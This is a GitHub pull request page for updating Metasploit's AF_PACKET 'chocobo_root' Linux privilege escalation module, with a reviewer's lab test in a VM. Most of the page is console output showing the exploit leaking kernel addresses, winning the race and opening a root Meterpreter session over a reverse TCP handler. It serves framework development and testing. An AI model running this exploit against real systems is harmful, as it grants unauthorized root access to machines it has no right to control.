
Update AF_PACKET chocobo_root Privilege Escalation module #12859

Merged
merged 1 commit into from Jan 24, 2020

Conversation

@bcoles
Contributor

bcoles commented Jan 19, 2020

Update AF_PACKET chocobo_root Privilege Escalation module

  • Uses the new Msf::Post::Linux::Compile mixin
  • Updates the chocobo_root.c C exploit code (and associated pre-compiled executable), which contains new targets for lowlatency kernels and some small changes.
  • Add notes about cross-compiling to documentation.
  • Updates the check method to search the C code for target kernel versions, ensuring a 1 to 1 mapping between the Metasploit module and the C exploit.
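The approach the last bullet describes, as an added Ruby illustration that is not the module's own code or chocobo_root.c: parse the kernel release strings out of the C source so the module's check cannot drift from what the compiled exploit supports. The C fragment, its field names and the release strings are constructed for this example.

```ruby
# Added example, not code from the Metasploit module or from chocobo_root.c:
# derive the exploit's target kernels from the C source so the module's
# check and the C exploit stay in a 1 to 1 mapping.
# The C fragment and release strings below are constructed; the real table
# in chocobo_root.c may be laid out differently.
SAMPLE_C_SOURCE = <<~'CSRC'
  /* one entry per supported kernel release */
  struct kernel_info kernels[] = {
    { .version = "4.4.0-21-generic",    .distro = "Ubuntu 16.04" },
    { .version = "4.4.0-51-generic",    .distro = "Ubuntu 16.04" },
    { .version = "4.4.0-51-lowlatency", .distro = "Ubuntu 16.04" },
    // { .version = "4.4.0-31-generic", .distro = "disabled, untested" },
  };
CSRC

# Shape of a `uname -r` release string quoted in the C source.
KERNEL_RELEASE_RE = /"(\d+\.\d+\.\d+-\d+-[a-z]+)"/

# Remove /* ... */ and // comments first so a commented-out entry is not
# reported as a live target.
def strip_c_comments(src)
  src.gsub(%r{/\*.*?\*/}m, '').gsub(%r{//[^\n]*}, '')
end

# Unique target releases, in the order they appear in the source.
def target_kernels(c_source)
  strip_c_comments(c_source).scan(KERNEL_RELEASE_RE).flatten.uniq
end

# What a check method would do with the output of `uname -r`.
def kernel_targeted?(c_source, kernel_release)
  target_kernels(c_source).include?(kernel_release.strip)
end

# Drift between the targets a module declares in its metadata and the ones
# the C code actually carries, reported from both sides.
def target_drift(module_targets, c_source)
  c_targets = target_kernels(c_source)
  { only_in_module: module_targets - c_targets,
    only_in_c: c_targets - module_targets }
end
```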
@timwr

Contributor

timwr commented Jan 24, 2020

I may have done something silly but I can't get the original exploit to work:

  1. Installed Ubuntu 16.04.4 desktop amd64 in Virtualbox.
  2. Installed an older kernel: sudo apt install linux-image-4.4.0-51-generic
  3. Enabled 2 cpus in Virtualbox
  4. Hold shift during boot, selected older kernel
  5. Get a session, set SESSION -1

msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set COMPILE False
COMPILE => False
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run

[*] Started reverse TCP handler on 192.168.43.200:4445
[+] Linux kernel version 4.4.0-51-generic is vulnerable
[+] SMAP is not enabled
[+] System architecture x86_64 is supported
[+] System has 2 CPU cores
[+] Kernel config has CONFIG_USER_NS enabled
[+] Unprivileged user namespaces are permitted
[+] LKRG is not installed
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.QvImJ02' (83976 bytes) ...
[*] Writing '/tmp/.XipOi' (250 bytes) ...
[*] Launching exploit (Timeout: 600)...

Running the exploit manually gives me:

user@user-VirtualBox:~$ /tmp/.oqQnPD
linux AF_PACKET race condition exploit by rebel
[.] starting
[.] checking hardware
[.] system has 2 processor cores
[~] done, hardware looks good
[.] checking kernel version
[.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[~] done, version looks good
[.] KASLR bypass enabled, getting kernel base address
[.] trying /proc/kallsyms...
[.] trying /boot/System.map-4.4.0-51-generic...
[-] open/read(/boot/System.map-4.4.0-51-generic)
[.] trying syslog...
[~] done, kernel text:     ffffffff81000000
[.] proc_dostring:         ffffffff81088090
[.] modprobe_path:         ffffffff81e48f80
[.] register_sysctl_table: ffffffff812879a0
[.] set_memory_rw:         ffffffff8106f320
[.] setting up namespace sandbox
[~] done, namespace sandbox set up
[.] making vsyscall page writable...

[.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[.] done, sockets allocated
[.] removing barrier and spraying...
[.] version switcher stopping, x = -1 (y = 55451, last val = 0)
[.] current packet version = 2
[.] pbd->hdr.bh1.offset_to_first_pkt = 48
[-] race not won

[.] retrying stage...
[.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[.] done, sockets allocated
[.] removing barrier and spraying...
[.] version switcher stopping, x = -1 (y = 98089, last val = 0)
[.] current packet version = 2
[.] pbd->hdr.bh1.offset_to_first_pkt = 48
[-] race not won

[.] retrying stage...
[.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[.] done, sockets allocated
[.] removing barrier and spraying...
[.] version switcher stopping, x = -1 (y = 102209, last val = 0)
[.] current packet version = 2
[.] pbd->hdr.bh1.offset_to_first_pkt = 48
[-] race not won

[.] retrying stage...
[.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[.] done, sockets allocated
[.] removing barrier and spraying...
[.] version switcher stopping, x = -1 (y = 134093, last val = 2)
[.] current packet version = 0
[.] pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*

[!] please wait up to a few minutes for timer to be executed.
[!] if you ctrl-c now the kernel will hang. so don't do that.

[.] closing socket and verifying...
[~] vsyscall page altered!
(Virtual machine freezes)
Connection to localhost closed by remote host.
Connection to localhost closed.

@timwr

Contributor

timwr commented Jan 24, 2020

It "worked" eventually:
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run

[*] Started reverse TCP handler on 192.168.43.200:4445
[+] Linux kernel version 4.4.0-51-generic is vulnerable
[+] SMAP is not enabled
[+] System architecture x86_64 is supported
[+] System has 2 CPU cores
[+] Kernel config has CONFIG_USER_NS enabled
[+] Unprivileged user namespaces are permitted
[+] LKRG is not installed
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.qguB6VP0n' (83976 bytes) ...
[*] Writing '/tmp/.uixrl9ZBhd' (250 bytes) ...
[*] Launching exploit (Timeout: 600)...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 192.168.43.200
[*] linux AF_PACKET race condition exploit by rebel
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*] [.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = -1 (y = 78819, last val = 2)
[*] [.] current packet version = 0
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 0
[*] [-] race not won
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*] [.] new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = -1 (y = 142865, last val = 2)
[*] [.] current packet version = 0
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 48
[*] *=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
[*]
[*] [!] please wait up to a few minutes for timer to be executed.
[*] [!] if you ctrl-c now the kernel will hang. so don't do that.
[*]
[*] [.] closing socket and verifying...
[*] [~] vsyscall page altered!
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] Meterpreter session 17 opened (192.168.43.200:4445 -> 192.168.43.200:34360) at 2020-01-24 16:17:47 +0800
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 1 completed
[*] [.] registering new sysctl...
[*]
[*] [.] new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = -1 (y = 171017, last val = 0)
[*] [.] current packet version = 2
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 65584
[*] [-] race not won
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 1 completed
[*] [.] registering new sysctl...
[*]
[*]
[*] [.] retrying stage...
[*] [.] new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = -1 (y = 152519, last val = 0)
[*] [.] current packet version = 2
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 48
[*] [-] race not won
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 1 completed
[*] [.] registering new sysctl...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [.] retrying stage...
[*] [.] new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
[*] [.] done, sockets allocated
[*] [.] removing barrier and spraying...
[*] [.] version switcher stopping, x = .....-1 (y = 329915, last val = 2)
[*] [.] current packet version = 0
[*] [.] pbd->hdr.bh1.offset_to_first_pkt = 48
[*] *=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
[*]
[*] [!] please wait up to a few minutes for timer to be executed.
[*] [!] if you ctrl-c now the kernel will hang. so don't do that.
[*]
[*] [.] closing socket and verifying...
[*] [~] sysctl added!
[*] [.] starting
[*] [.] checking hardware
[*] [.] system has 2 processor cores
[*] [~] done, hardware looks good
[*] [.] checking kernel version
[*] [.] kernel version '4.4.0-51-generic #72-Ubuntu' detected
[*] [~] done, version looks good
[*] [.] KASLR bypass enabled, getting kernel base address
[*] [.] trying /proc/kallsyms...
[*] [.] trying /boot/System.map-4.4.0-51-generic...
[*] [-] open/read(/boot/System.map-4.4.0-51-generic)
[*] [.] trying syslog...
[*] [~] done, kernel text:     ffffffff81000000
[*] [.] proc_dostring:         ffffffff81088090
[*] [.] modprobe_path:         ffffffff81e48f80
[*] [.] register_sysctl_table: ffffffff812879a0
[*] [.] set_memory_rw:         ffffffff8106f320
[*] [.] setting up namespace sandbox
[*] [~] done, namespace sandbox set up
[*] [.] making vsyscall page writable...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 1 completed
[*] [.] registering new sysctl...
[*]
[*]
[*] [.] retrying stage...
[*]
[*] [.] retrying stage...
[*]
[*] [~] done, stage 2 completed
[*] Cleaning up /tmp/.uixrl9ZBhd and /tmp/.qguB6VP0n..
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_delete_file: Operation failed: 1
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                           Connection
  --  ----  ----                   -----------                                           ----------
  16        meterpreter x64/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 10.0.2.15  192.168.43.200:4444 -> 192.168.43.200:51644 (10.0.2.15)
  17        meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ 10.0.2.15              192.168.43.200:4445 -> 192.168.43.200:34360 (10.0.2.15)

msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > sessions 17

@timwr

Contributor

timwr commented Jan 24, 2020

The changes look good (and have no effect on the reliability issue above). Nice work @bcoles

@timwr timwr self-assigned this Jan 24, 2020
@bcoles

Contributor Author

bcoles commented Jan 24, 2020

@timwr the exploit was never 100% reliable, although it's a little disconcerting that it failed on your first attempt.

The changes I made shouldn't have affected the reliability, but I'm willing to admit I may have done something stupid or overlooked something. The changes are mostly style related, plus some new targets and KASLR bypass, which shouldn't affect memory layout.

timwr added a commit that referenced this pull request Jan 24, 2020
@timwr timwr merged commit 19b1f56 into rapid7:master Jan 24, 2020
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
@bcoles bcoles deleted the bcoles:af_packet_chocobo_root_priv_esc branch Jan 24, 2020
@tperry-r7

Contributor

tperry-r7 commented Feb 4, 2020

Release Notes

This updated the AF_PACKET chocobo_root Privilege Escalation module.

  • Uses the new Msf::Post::Linux::Compile mixin
  • Updates the chocobo_root.c C exploit code and associated pre-compiled executable, which contains new targets for low latency kernels and other changes.
  • Updates the check method to search the C code for target kernel versions, ensuring a 1 to 1 mapping between the Metasploit module and the C exploit.